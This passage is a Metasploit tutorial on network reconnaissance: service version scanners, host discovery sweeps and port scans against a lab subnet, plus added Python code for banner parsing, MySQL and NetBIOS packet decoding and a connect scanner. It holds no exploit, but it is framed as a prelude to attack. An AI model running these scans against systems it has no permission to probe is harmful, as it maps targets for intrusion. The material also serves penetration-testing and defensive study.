These modules are commonly used to discover the usual services on a local network, such as HTTP, FTP and TELNET, and to pull a version string from each one before any exploitation is attempted.

MSF module search:

[root@localhost ~]# msfconsole
msf5 > search scanner type:auxiliary
msf5 > search scanner/http type:auxiliary      // search all HTTP-related auxiliary modules
Discovering HTTP services: based on scanner/http/http_version

Discover HTTP services. The module reports the Server header, the X-Powered-By header and, if the root URL redirects, the status code and redirect target; a 302 to login.php or admin.php is worth noting as an authentication page for later.

msf5 > use scanner/http/http_version
msf5 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/http/http_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/http/http_version) > set rport 80
rport => 80
msf5 auxiliary(scanner/http/http_version) > exploit

[+] 192.168.1.7:80 Apache/2.4.6 (CentOS) PHP/5.4.16 ( Powered by PHP/5.4.16, 302-login.php )
[+] 192.168.1.3:80 Apache/2.5.0 (CentOS) PHP/7.0.0 ( Powered by PHP/7.0.0, 302-admin.php )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Discovering SMB services: based on scanner/smb/smb_version

Discover SMB services. Credentials are optional; without them the module still identifies Windows builds and Samba versions from the negotiate and session-setup responses, as the output below shows.

msf5 > use scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/smb/smb_version) > exploit

[+] 192.168.1.2:445       - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark)
[*] 192.168.1.7:445       - Host could not be identified: Windows 6.1 (Samba 4.8.3)
[*] 192.168.1.0/24:445    - Scanned  26 of 256 hosts (10% complete)
[*] 192.168.1.0/24:445    - Caught interrupt from the console...
[*] Auxiliary module execution completed
Discovering FTP services: based on scanner/ftp/ftp_version

Discover FTP services. The module simply records the 220 greeting banner, which for vsFTPd contains the exact version.

msf5 > use scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > show options

Module options (auxiliary/scanner/ftp/ftp_version):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS   192.168.1.0/24       yes       The target address range or CIDR identifier
   RPORT    21                   yes       The target port (TCP)
   THREADS  10                   yes       The number of concurrent threads

msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/ftp/ftp_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/ftp/ftp_version) > exploit

[+] 192.168.1.7:21        - FTP Banner: '220 (vsFTPd 3.0.2)\x0d\x0a'
[*] 192.168.1.0/24:21     - Scanned  32 of 256 hosts (12% complete)
[*] 192.168.1.0/24:21     - Caught interrupt from the console...
[*] Auxiliary module execution completed
Discovering SSH services: based on auxiliary/scanner/ssh/ssh_version

Discover SSH services. The server sends its identification string before any key exchange, so the version is obtained without authenticating; Metasploit also maps the banner to a vendor/product/CPE.

msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port (TCP)
   THREADS  10               yes       The number of concurrent threads
   TIMEOUT  30               yes       Timeout for the SSH probe

msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/ssh/ssh_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/ssh/ssh_version) > exploit

[+] 192.168.1.7:22        - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.1.0/24:22     - Caught interrupt from the console...
[*] Auxiliary module execution completed
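The three version scanners above (http_version, ftp_version, ssh_version) all do the same thing: connect, read what the service volunteers, and pull product and version out of it. The following is an added example, not code from the page or from Metasploit, that reproduces that parsing in Python. The sample banners are constructed here and modelled on the values printed above; the CPE format and the "302-login.php" redirect notation are copied from the module output, and grab_banner is a plain socket helper for live use that is not exercised offline.

```python
import re
import socket

# Constructed sample banners (not captures from the page), modelled on the values
# the http_version, ftp_version and ssh_version modules printed above.
SAMPLE_SSH_BANNER = b"SSH-2.0-OpenSSH_7.4\r\n"
SAMPLE_FTP_BANNER = b"220 (vsFTPd 3.0.2)\r\n"
SAMPLE_HTTP_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: Apache/2.4.6 (CentOS) PHP/5.4.16\r\n"
    b"X-Powered-By: PHP/5.4.16\r\n"
    b"Location: login.php\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def parse_ssh_banner(banner: bytes) -> dict:
    """RFC 4253 identification string: SSH-<proto>-<software>[ <comments>]."""
    line = banner.split(b"\n", 1)[0].strip().decode("ascii", "replace")
    m = re.match(r"^SSH-(\d\.\d+)-(\S+)(?:\s+(.*))?$", line)
    if not m:
        return {}
    proto, software, comment = m.groups()
    info = {"protocol": proto, "software": software, "comment": comment or ""}
    # OpenSSH_7.4 / OpenSSH_7.4p1 -> product, version and the CPE string the module shows
    m = re.match(r"^OpenSSH_(\d+(?:\.\d+)*)(p\d+)?", software)
    if m:
        info["product"] = "OpenSSH"
        info["version"] = m.group(1)
        info["cpe23"] = "cpe:/a:openbsd:openssh:" + m.group(1)
    return info


def parse_ftp_banner(banner: bytes) -> dict:
    """FTP greeting '220 <text>'; vsFTPd puts '(vsFTPd 3.0.2)' in the text."""
    line = banner.split(b"\n", 1)[0].strip().decode("ascii", "replace")
    m = re.match(r"^(\d{3})[ -](.*)$", line)
    if not m:
        return {}
    code, text = m.groups()
    info = {"code": code, "banner": text}
    m = re.search(r"([A-Za-z][\w-]*)[ /]v?(\d+(?:\.\d+)+)", text)
    if m:
        info["product"], info["version"] = m.group(1), m.group(2)
    return info


def parse_http_response(raw: bytes) -> dict:
    """Pull the fields http_version reports: Server, X-Powered-By and redirect target."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    m = re.match(r"^HTTP/\d\.\d (\d{3})", lines[0])
    if not m:
        return {}
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    info = {"status": int(m.group(1)), "server": headers.get("server", ""),
            "powered_by": headers.get("x-powered-by", "")}
    if info["status"] in (301, 302, 303, 307, 308) and "location" in headers:
        info["redirect"] = f"{info['status']}-{headers['location']}"
    return info


def grab_banner(host: str, port: int, probe: bytes = b"", timeout: float = 3.0) -> bytes:
    """Live banner grab (not exercised offline): connect, optionally send a probe such as
    b"GET / HTTP/1.0\\r\\nHost: x\\r\\n\\r\\n" for HTTP, and read what the service sends."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        chunks = []
        try:
            while len(b"".join(chunks)) < 4096:
                data = s.recv(1024)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
        return b"".join(chunks)


def fingerprint(host: str, port: int, data: bytes) -> dict:
    """Dispatch on the content of the reply the way a version scanner does."""
    if data.startswith(b"SSH-"):
        return {"host": host, "port": port, **parse_ssh_banner(data)}
    if data.startswith(b"HTTP/"):
        return {"host": host, "port": port, **parse_http_response(data)}
    if re.match(rb"^\d{3}[ -]", data):
        return {"host": host, "port": port, **parse_ftp_banner(data)}
    return {"host": host, "port": port, "raw": data[:64]}
```

SSH and FTP speak first, so an empty probe is enough; HTTP only answers after a request, which is why http_version needs RPORT/VHOST while the other two just need the port. Note that a banner is a claim, not proof: an administrator can change the Server header or the SSH version string, so version-based vulnerability matching should be confirmed by behaviour before it drives an exploit choice.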
Discovering Telnet services: based on auxiliary/scanner/telnet/telnet_version

Discover Telnet services. In this run nothing on the /24 had port 23 open: every host either refused the connection or was unreachable.

msf5 > use auxiliary/scanner/telnet/telnet_version
msf5 auxiliary(scanner/telnet/telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS    192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT     23               yes       The target port (TCP)
   THREADS   10               yes       The number of concurrent threads
   TIMEOUT   30               yes       Timeout for the Telnet probe
   USERNAME                   no        The username to authenticate as

msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/telnet/telnet_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_version) > exploit

[-] 192.168.1.1:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.1:23).
[-] 192.168.1.7:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.7:23).
[-] 192.168.1.0:23        - A network issue has occurred: The host (192.168.1.0:23) was unreachable.
[-] 192.168.1.10:23       - A network issue has occurred: The connection was refused by the remote host (192.168.1.10:23).
[-] 192.168.1.3:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.3:23).
[-] 192.168.1.5:23        - A network issue has occurred: The host (192.168.1.5:23) was unreachable.
[*] 192.168.1.0/24:23     - Caught interrupt from the console...
[*] Auxiliary module execution completed
Discovering MySQL services: based on auxiliary/scanner/mysql/mysql_version

Discover MySQL services. The module reads the server's first packet. When the scanning host is not allowed to connect, the server answers with an error packet instead of a handshake, which is still enough to confirm a MySQL/MariaDB listener, as seen below.

msf5 > use auxiliary/scanner/mysql/mysql_version
msf5 auxiliary(scanner/mysql/mysql_version) > show options

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier
   RPORT    3306             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads

msf5 auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/mysql/mysql_version) > set rport 3306
rport => 3306
msf5 auxiliary(scanner/mysql/mysql_version) > exploit

[*] 192.168.1.7:3306      - 192.168.1.7:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.7' is not allowed to connect to this MariaDB server
[*] 192.168.1.7:3306      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
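The stray "\x04" in front of "Host '192.168.1.7' ..." above is not garbage: it is the high byte of MySQL error code 1130 (ER_HOST_NOT_PRIVILEGED), which the server sends little-endian as 0x6a 0x04 right after the 0xff error marker, and the module printed the message from one byte too early. The following added example, not code from the page or from Metasploit, decodes both kinds of first packet a MySQL/MariaDB server can send: the protocol-10 handshake (which carries the version string a scanner wants) and the pre-authentication error packet. The packets are constructed here; the "5.5.68-MariaDB" version, connection id and capability value are invented for the example.

```python
import struct


def _frame(payload: bytes, seq: int = 0) -> bytes:
    """MySQL wire framing: 3-byte little-endian payload length, 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq]) + payload


# Constructed error packet: what a server returns when the client address has no GRANT.
# Error code 1130 = 0x046a, sent little-endian as b"\x6a\x04"; the pre-auth error carries
# no '#SQLSTATE' prefix, so the message text follows the code directly.
SAMPLE_ERR = _frame(b"\xff" + struct.pack("<H", 1130)
                    + b"Host '192.168.1.7' is not allowed to connect to this MariaDB server")


def _handshake_v10(version: bytes, conn_id: int,
                   plugin: bytes = b"mysql_native_password") -> bytes:
    """Constructed HandshakeV10 packet for a hypothetical server (field order per the
    MySQL client/server protocol; salt and capability value are made up)."""
    salt = b"ABCDEFGHIJKLMNOPQRST"            # 20-byte auth-plugin-data (scramble)
    caps = 0x000FF7FF                          # capability flags (constructed value)
    payload = (b"\x0a" + version + b"\x00" + struct.pack("<I", conn_id)
               + salt[:8] + b"\x00"                        # auth-plugin-data part 1, filler
               + struct.pack("<H", caps & 0xFFFF)          # capability flags, lower 2 bytes
               + b"\x21"                                   # character set (utf8_general_ci)
               + struct.pack("<H", 0x0002)                 # status flags (SERVER_STATUS_AUTOCOMMIT)
               + struct.pack("<H", caps >> 16)             # capability flags, upper 2 bytes
               + bytes([len(salt) + 1]) + b"\x00" * 10     # auth-plugin-data length, reserved
               + salt[8:] + b"\x00"                        # auth-plugin-data part 2 (13 bytes)
               + plugin + b"\x00")
    return _frame(payload)


SAMPLE_HANDSHAKE = _handshake_v10(b"5.5.68-MariaDB", 42)


def parse_mysql_greeting(data: bytes) -> dict:
    """Decode the first server packet: either HandshakeV10 or an ERR packet."""
    if len(data) < 5:
        raise ValueError("short packet")
    length = data[0] | data[1] << 8 | data[2] << 16
    seq = data[3]
    payload = data[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    if payload[0] == 0xFF:                         # ERR_Packet
        code = struct.unpack_from("<H", payload, 1)[0]
        msg = payload[3:]
        info = {"kind": "error", "seq": seq, "code": code}
        # After CLIENT_PROTOCOL_41 is negotiated, errors carry '#' + 5-char SQLSTATE;
        # the pre-auth error does not, so only strip it when it is present.
        if msg[:1] == b"#" and len(msg) >= 6:
            info["sqlstate"] = msg[1:6].decode("ascii")
            msg = msg[6:]
        info["message"] = msg.decode("utf-8", "replace")
        return info
    if payload[0] == 0x0A:                         # HandshakeV10
        end = payload.index(b"\x00", 1)
        version = payload[1:end].decode("ascii", "replace")
        off = end + 1
        conn_id = struct.unpack_from("<I", payload, off)[0]
        off += 4 + 8 + 1                           # conn_id, auth-data part 1, filler
        cap_lo = struct.unpack_from("<H", payload, off)[0]
        off += 2
        charset = payload[off]
        status = struct.unpack_from("<H", payload, off + 1)[0]
        cap_hi = struct.unpack_from("<H", payload, off + 3)[0]
        auth_len = payload[off + 5]
        off += 6 + 10                              # past auth_len and the 10 reserved bytes
        off += max(13, auth_len - 8)               # auth-plugin-data part 2
        plugin = payload[off:payload.index(b"\x00", off)].decode("ascii", "replace") if off < len(payload) else ""
        return {"kind": "handshake", "seq": seq, "protocol": 10, "version": version,
                "connection_id": conn_id, "capabilities": cap_lo | cap_hi << 16,
                "charset": charset, "status": status, "auth_plugin": plugin,
                "mariadb": "MariaDB" in version}
    raise ValueError(f"unexpected first byte 0x{payload[0]:02x}")
```

A host-not-allowed error tells you two things beyond "MySQL is here": the server is MariaDB (it says so in the message), and it enforces per-host grants, so a login brute force from this source address will fail regardless of the wordlist; an attacker would need to come from an allowed host, which is exactly the information a defender wants to keep out of the error text.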
Discovering MSSQL services: based on auxiliary/scanner/mssql/mssql_ping

Discover SQL Server services. mssql_ping queries the SQL Server Browser service over UDP/1434 and lists the instances it advertises (instance name, version, TCP port), which is why there is no RPORT option; the credential options are not needed for the ping itself.

msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS               192.168.1.0/24   yes       The target address range or CIDR identifier
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              10               yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/mssql/mssql_ping) > set threads 10
threads => 10
msf5 auxiliary(scanner/mssql/mssql_ping) > run
Discovering Oracle services: based on auxiliary/scanner/oracle/tnslsnr_version

Discover Oracle services. The module sends a TNS VERSION command to the listener on 1521 and reports the version string it returns.

msf5 > use auxiliary/scanner/oracle/tnslsnr_version
msf5 auxiliary(scanner/oracle/tnslsnr_version) > show options

Module options (auxiliary/scanner/oracle/tnslsnr_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT    1521             yes       The target port (TCP)
   THREADS  10               yes       The number of concurrent threads

msf5 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/oracle/tnslsnr_version) > set threads 10
threads => 10
msf5 auxiliary(scanner/oracle/tnslsnr_version) > run
MSF also provides auxiliary modules for host discovery, located under modules/auxiliary/scanner/discovery/. The main ones are arp_sweep, ipv6_multicast_ping, ipv6_neighbor, ipv6_neighbor_router_advertisement, udp_probe and udp_sweep. The usage of the commonly used ones follows.
ARP discovery of internal hosts: based on scanner/discovery/arp_sweep

Discover live hosts on the LAN. ARP only works on the local broadcast domain, so this is the most reliable method for a directly connected subnet (hosts cannot filter ARP and still have an IP), but it cannot see anything behind a router. The module injects raw frames, so it needs root privileges and a real interface, not a NAT'd VM adapter.

msf5 > use scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 10
threads => 10
msf5 auxiliary(scanner/discovery/arp_sweep) > exploit

[+] 192.168.1.1 appears to be up (UNKNOWN).
[+] 192.168.1.2 appears to be up (UNKNOWN).
[+] 192.168.1.2 appears to be up (UNKNOWN).
[+] 192.168.1.1 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
UDP discovery of internal hosts: based on scanner/discovery/udp_sweep

Discover live hosts on the LAN. udp_sweep sends a small set of UDP probes (DNS, NetBIOS name service, SNMP, NTP and others) to every address and reports whatever answers. Here the NetBIOS node-status reply from 192.168.1.2 leaks its hostname, workgroup and MAC address without any authentication.

msf5 > use scanner/discovery/udp_sweep
msf5 auxiliary(scanner/discovery/udp_sweep) > show options

Module options (auxiliary/scanner/discovery/udp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/discovery/udp_sweep) > set rhosts 192.168.1.0/24
rhosts => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/udp_sweep) > exploit

[*] Sending 13 probes to 192.168.1.0->192.168.1.255 (256 hosts)
[*] Discovered NetBIOS on 192.168.1.2:137 (lyshark:<20>:U :lysahrk:<00>:U :lyshark:<00>:G :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U :__MSBROWSE__:<01>:G :a4:be:c8:fe:ac:z4)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
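The "Discovered NetBIOS" line above is a decoded NBSTAT (node status) response: each entry is a NetBIOS name, its 1-byte suffix (<20> file server, <00> workstation, <1e> browser election group, <01> the \x01\x02__MSBROWSE__\x02 master-browser name), a U/G flag for unique vs group name, and finally the adapter MAC from the statistics block. The following added example, not code from the page or from Metasploit, builds the wildcard node-status query that this kind of probe sends and decodes a reply. The sample reply is constructed here, modelled on the host the page found (names, suffixes and MAC are made up); nbstat() is the live version and is not exercised offline.

```python
import socket
import struct

NBNS_PORT = 137
NBSTAT_TYPE = 0x0021


def _encode_nb_name(name: bytes) -> bytes:
    """RFC 1001 first-level encoding: each nibble of the 16-byte padded name plus 'A'.
    The wildcard '*' is padded with NULs, ordinary names with spaces."""
    padded = name.ljust(16, b"\x00") if name == b"*" else name.ljust(16, b" ")
    out = bytearray()
    for b in padded:
        out += bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41])
    return bytes([32]) + bytes(out) + b"\x00"


def build_nbstat_query(tid: int = 0x1234) -> bytes:
    """Node-status request for '*': one question, RR type NBSTAT, class IN."""
    header = struct.pack("!6H", tid, 0x0000, 1, 0, 0, 0)
    return header + _encode_nb_name(b"*") + struct.pack("!HH", NBSTAT_TYPE, 0x0001)


def decode_nbstat_response(data: bytes) -> dict:
    tid, flags, qd, an, ns, ar = struct.unpack_from("!6H", data, 0)
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a NBNS response carrying an answer")
    off = 12
    while data[off]:                              # skip the length-prefixed name labels
        off += 1 + data[off]
    off += 1
    rtype, rclass, ttl, rdlen = struct.unpack_from("!HHIH", data, off)
    off += 10
    if rtype != NBSTAT_TYPE:
        raise ValueError(f"unexpected RR type 0x{rtype:04x}")
    num_names = data[off]
    off += 1
    names = []
    for _ in range(num_names):
        raw, suffix = data[off:off + 15], data[off + 15]
        name_flags = struct.unpack_from("!H", data, off + 16)[0]
        off += 18
        if raw.startswith(b"\x01\x02"):          # master browser: \x01\x02__MSBROWSE__\x02
            text = "__MSBROWSE__"
        else:
            text = raw.rstrip(b" \x00").decode("latin-1")
        names.append({"name": text, "suffix": suffix,
                      "group": bool(name_flags & 0x8000),   # G bit: group vs unique name
                      "active": bool(name_flags & 0x0400)}) # ACT bit
    mac = ":".join(f"{b:02x}" for b in data[off:off + 6])  # unit ID = adapter MAC
    return {"tid": tid, "names": names, "mac": mac}


def format_like_msf(decoded: dict) -> str:
    """Same layout udp_sweep prints: name:<suffix>:U|G entries, then the MAC."""
    parts = [f"{n['name']}:<{n['suffix']:02x}>:{'G' if n['group'] else 'U'} "
             for n in decoded["names"]]
    return ":".join(parts) + ":" + decoded["mac"]


def nbstat(host: str, timeout: float = 2.0) -> dict:
    """Live query (not run offline): one datagram to UDP/137, decode the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_query(), (host, NBNS_PORT))
        data, _ = s.recvfrom(1024)
    return decode_nbstat_response(data)


def make_sample_response(tid: int = 0x1234) -> bytes:
    """Constructed reply (not a real capture) with the name types seen on the page."""
    entries = [(b"LYSHARK", 0x20, False), (b"LYSHARK", 0x00, False),
               (b"WORKGROUP", 0x00, True), (b"WORKGROUP", 0x1e, True),
               (b"\x01\x02__MSBROWSE__\x02", 0x01, True)]
    body = bytes([len(entries)])
    for name, suffix, group in entries:
        body += name.ljust(15, b" ") + bytes([suffix]) \
                + struct.pack("!H", (0x8000 if group else 0) | 0x0400)
    body += bytes.fromhex("a4bec8feac04") + b"\x00" * 40   # unit ID (MAC) + statistics
    rr = _encode_nb_name(b"*") + struct.pack("!HHIH", NBSTAT_TYPE, 0x0001, 0, len(body)) + body
    return struct.pack("!6H", tid, 0x8400, 0, 1, 0, 0) + rr
```

Because the reply is unauthenticated and comes from a single datagram, this is one of the cheapest ways to get a hostname and workgroup for every Windows or Samba host on a segment; the defensive fix is to disable NetBIOS over TCP/IP on interfaces that do not need it and filter UDP/137 at the segment boundary.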
ACK scan of an internal host: based on auxiliary/scanner/portscan/ack

Scan a live host. An ACK scan sends bare ACK segments: a port that answers with RST is reported as unfiltered, silence means a stateful firewall dropped the packet. It maps filtering rules rather than finding open ports, and like the SYN scan it crafts raw packets, so it needs root privileges and pcap support. Nothing was reported against 192.168.1.7 in this run.

msf5 > use auxiliary/scanner/portscan/ack
msf5 auxiliary(scanner/portscan/ack) > show options

Module options (auxiliary/scanner/portscan/ack):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/ack) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/ack) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/ack) > exploit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
SYN scan of an internal host: based on auxiliary/scanner/portscan/syn

Scan a live host. A SYN (half-open) scan sends SYN and treats SYN/ACK as open without completing the handshake, so the service never sees a connection and usually logs nothing; it needs raw packet access (root and pcap) and does not work through a pivot.

msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS      1-1024           yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    10               yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/syn) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/syn) > run
TCP connect scan of an internal host: based on auxiliary/scanner/portscan/tcp

Scan a live host. This module completes a full TCP handshake on every port, so it needs no raw sockets and works through a Meterpreter pivot, at the cost of every open port logging a connection. The result matches the services found earlier on 192.168.1.7: FTP, SSH, HTTP and SMB.

msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.1.7      yes       The target address range or CIDR identifier
   THREADS      10               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.7
rhosts => 192.168.1.7
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.1.7:          - 192.168.1.7:21 - TCP OPEN
[+] 192.168.1.7:          - 192.168.1.7:22 - TCP OPEN
[+] 192.168.1.7:          - 192.168.1.7:80 - TCP OPEN
[+] 192.168.1.7:          - 192.168.1.7:139 - TCP OPEN
[+] 192.168.1.7:          - 192.168.1.7:445 - TCP OPEN
[*] 192.168.1.7:          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
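The connect scan is the one of the three port scanners above that needs no privileges, so it is worth seeing what it actually does. The following added example, not code from the page or from Metasploit, implements a connect scan with the module's PORTS syntax and a CONCURRENCY-style thread pool, and distinguishes the three outcomes a full connect gives: open (handshake completes), closed (RST, seen as a refused connection) and filtered (no answer within the timeout). demo_localhost() exercises it offline against a listener it opens itself; host and port values are otherwise assumptions.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def parse_ports(spec: str) -> list:
    """Accept the module's PORTS syntax, e.g. '22-25,80,110-900'; drops invalid ports."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = part.split("-", 1)
            ports.update(range(int(lo), int(hi) + 1))
        else:
            ports.add(int(part))
    return sorted(p for p in ports if 0 < p < 65536)


def probe_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Full TCP connect like scanner/portscan/tcp. A refused connection means the host
    answered with RST (closed); a timeout means something dropped the SYN (filtered)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, OSError):
            return "filtered"


def connect_scan(host: str, ports, concurrency: int = 10, timeout: float = 1.0) -> dict:
    """Probe ports with a thread pool (the module's CONCURRENCY); returns {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        states = pool.map(lambda p: probe_port(host, p, timeout), ports)
        return dict(zip(ports, states))


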